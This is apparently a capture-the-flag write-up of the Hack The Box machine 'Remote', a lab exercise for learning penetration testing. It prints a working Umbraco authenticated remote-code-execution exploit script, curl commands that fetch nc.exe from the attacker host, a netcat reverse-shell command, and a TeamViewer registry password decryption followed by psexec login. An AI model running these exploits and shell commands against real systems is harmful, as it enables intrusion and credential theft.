Post

Hack The Box - Remote

From this write-up, I probably learnt that it is best to get the screenshots and command outputs immediately or while you pwn the box as your exploits may not work in the future. However, it did teach me not to blindly rely on the online scripts to work perfectly everytime and I learnt how to fix them :)

Configuration

The operating system that I will be using to tackle this machine is a Kali Linux VM.

What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.

1
$ echo "10.10.10.180 remote.htb" >> /etc/hosts

Reconnaissance

Using nmap, we are able to determine the open ports and running services on the machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$ nmap -sV -sT -sC remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 05:30 EDT
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.27s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
1119/tcp filtered bnetgame
2049/tcp open     mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m12s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-22T09:34:15
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.43 seconds

Enumeration (1)

Even though Anonymous FTP login was allowed, there was no files on the ftp service on port 21 :( Moving on, we see a http service running port 80 so lets check that out.

This website seems like its based on a web template but let’s continue crawling around…

http://remote.htb/contact/:

On this page was this button that brings me to a login page of a content management system (CMS) called Umbraco!

We don’t have credentials to login with but I did find an exploit we can possibly use on this CMS. However, this exploit require us to be authenticated but we can keep this exploit for later on.

Going back to the scan results, we see a large chuck of rpcbind information from port 111, but below that we see a mountd service running on port 2049

Using showmount, we can see what NFS (Network File Share) shares are available on the service.

1
2
3
$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

Lets try mounting it on our machine:

1
2
$ mkdir /mnt/nfs
$ mount -t nfs -o vers=3 remote.htb:/site_backups /mnt/nfs

No output but I guess it worked? Lets see whats inside!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ cd /mnt/nfs
$ ls -al
total 123
drwx------ 2 4294967294 4294967294  4096 Aug 15 11:12 .
drwxr-xr-x 3 root       root        4096 Aug 16 15:15 ..
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 App_Browsers
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:17 App_Data
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 App_Plugins
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 aspnet_client
drwx------ 2 4294967294 4294967294 49152 Feb 20 12:16 bin
drwx------ 2 4294967294 4294967294  8192 Feb 20 12:16 Config
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 css
-rwx------ 1 4294967294 4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 4294967294 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 Media
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 scripts
drwx------ 2 4294967294 4294967294  8192 Feb 20 12:16 Umbraco
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 Umbraco_Client
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 Views
-rwx------ 1 4294967294 4294967294 28539 Feb 20 00:57 Web.config

This seem like a folder containing the contents of the Umbraco CMS. Since this files and folders could be a backup of the current Umbraco instance that is running, lets see if we can find any hard-coded configuration or credentials we can use.

Digging around, I found a Umbraco.sdf under App_Data. Searching online, it says that this file was an SQL file containing the contents of the Umbraco CMS! Nice! However, this file is in binary but we can run strings on it and eyeball for information.

1
2
3
4
5
6
7
8
9
$ strings Umbraco.sdf | less
...
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
...

Alright, we see what seems to be login information such as the username, email, password hashes as well as the hash algorithm used. We can see 2 users: admin and ssmith, but hash of admin@htb.local is in SHA1 while the hash of ssmith@htb.local is in HMACSHA256. HMACSHA256 needs a key to be cracked but we are not sure how it was implemented in this system but we can definitely crack the SHA1 hash online.

https://crackstation.net/:

Lets check if baconandcheese is still being used for the admin@htb.local account.

After pressing “Login”, nothing appeared on webpage but we know that the login was successful. Remember the exploit we found just now? Lets see if this exploit works with our credentials that we found.

Exploitation

1
2
3
4
$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c whoami"
k (most recent call last):
  File "umbraco3.py", line 53, in <module>
    VIEWSTATE = soup.find(id="__VIEWSTATE")['value']

When I first pwned this box, this exploit was working fine! Fortunately, I was able to debug and realised that the new cookies set after successful logon were not being saved properly, so I tweaked the script a little:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
# Exploit Title: Umbraco CMS - Authenticated Remote Code Execution 
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse
from http.cookies import SimpleCookie

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()

# START OF MODIFIED SECTION
# r2 = s.post(url_login,json=loginfo)
r2 = requests.post(url_login,json=loginfo)
cookie = SimpleCookie()
cookie.load(r2.headers["Set-Cookie"])

for key,value in cookie.items():
    cookie_obj = requests.cookies.create_cookie(name=key,value=value.value)
    s.cookies.set_cookie(cookie_obj)
# END OF MODIFIED SECTION


# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)


soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)

# print(r4.text)
# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

Now, lets test it out.

1
2
3
$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c whoami"
iis apppool\defaultapppool

With RCE on the box, we can now upload our nc.exe to it and establish a reverse shell.

1
2
3
4
5
6
7
8
9
10
11
$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c mkdir C:\\\\tmp"

$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c curl http://10.10.XX.XX/nc.exe > C:\\\\tmp\\\\nc.exe"

$ nc -lvnp 1337
istening on [any] 1337 ...

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c C:\\\\tmp\\\\nc.exe -e cmd.exe 10.10.XX.XX 1337"

On our nc listener`, we catch our reverse shell.

1
2
3
4
5
6
7
listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.180] 49708
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool

user.txt

As the current user did not have a home directory, I had to resort to using where to find it.

1
2
3
4
c:\windows\system32\inetsrv> where /R C:\ user.txt
C:\Users\Public\user.txt
c:\windows\system32\inetsrv> type C:\Users\Public\user.txt
cf70XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Enumeration (2)

Lets check whats installed on the system.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
c:\windows\system32\inetsrv> dir "C:\Program Files"
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files

02/23/2020  03:19 PM    <DIR>          .
02/23/2020  03:19 PM    <DIR>          ..
02/19/2020  04:04 PM    <DIR>          Common Files
09/15/2018  05:06 AM    <DIR>          internet explorer
02/23/2020  03:16 PM    <DIR>          Microsoft SQL Server
02/19/2020  04:11 PM    <DIR>          MSBuild
02/19/2020  04:11 PM    <DIR>          Reference Assemblies
02/19/2020  04:04 PM    <DIR>          VMware
02/20/2020  07:46 AM    <DIR>          Windows Defender
09/15/2018  05:05 AM    <DIR>          Windows Defender Advanced Threat Protection
09/15/2018  03:19 AM    <DIR>          Windows Mail
10/29/2018  06:39 PM    <DIR>          Windows Media Player
09/15/2018  03:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  03:28 AM    <DIR>          windows nt
10/29/2018  06:39 PM    <DIR>          Windows Photo Viewer
09/15/2018  03:19 AM    <DIR>          Windows Portable Devices
09/15/2018  03:19 AM    <DIR>          Windows Security
09/15/2018  03:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  19,394,420,736 bytes free

c:\windows\system32\inetsrv> dir "C:\Program Files (x86)"
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files (x86)

02/23/2020  03:19 PM    <DIR>          .
02/23/2020  03:19 PM    <DIR>          ..
09/15/2018  03:28 AM    <DIR>          Common Files
09/15/2018  05:06 AM    <DIR>          Internet Explorer
02/23/2020  03:19 PM    <DIR>          Microsoft SQL Server
02/23/2020  03:15 PM    <DIR>          Microsoft.NET
02/19/2020  04:11 PM    <DIR>          MSBuild
02/19/2020  04:11 PM    <DIR>          Reference Assemblies
02/20/2020  03:14 AM    <DIR>          TeamViewer
09/15/2018  05:05 AM    <DIR>          Windows Defender
09/15/2018  03:19 AM    <DIR>          Windows Mail
10/29/2018  06:39 PM    <DIR>          Windows Media Player
09/15/2018  03:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  03:28 AM    <DIR>          windows nt
10/29/2018  06:39 PM    <DIR>          Windows Photo Viewer
09/15/2018  03:19 AM    <DIR>          Windows Portable Devices
09/15/2018  03:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              17 Dir(s)  19,394,396,160 bytes free

“TeamViewer”? This definitely seem worth looking into. Maybe there are saved passwords? I couldn’t find any config files containing saved passwords so another location that stores configs is probably the registry.

1
2
3
4
5
6
7
8
9
c:\windows\system32\inetsrv> reg query HKLM /s /k /f "TeamViewer"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TeamViewer 7
HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TeamViewerConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TeamViewerSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TeamViewer7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TeamViewer7
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TeamViewer7
End of search: 7 match(es) found

HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer seems promising so lets check that out.

1
2
3
4
5
6
c:\windows\system32\inetsrv> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer" /s
...
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
...
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
...

Seems like I was right! Using this script from this link, I was able to retrieve the decrypted password.

1
2
3
4
5
6
7
8
9
10
$ python3 tv.py 

This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity.
Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
 
Please check below mentioned registry values and enter its value manually without spaces.
"SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword"

Enter output from registry without spaces : FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
Decrypted password is :  !R3m0te!

root.txt

With !R3m0te!, lets check if we can get into the Administrator’s account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ python psexec.py 'Administrator:!R3m0te!@remote.htb'
Impacket v0.9.22.dev1+20200713.100928.1e84ad60 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on remote.htb.....
[*] Found writable share ADMIN$
[*] Uploading file FNFPcETB.exe
[*] Opening SVCManager on remote.htb.....
[*] Creating service xGXs on remote.htb.....
[*] Starting service xGXs.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
baceXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Rooted ! Thank you for reading and look forward for more writeups and articles !

This post is licensed under CC BY 4.0 by the author.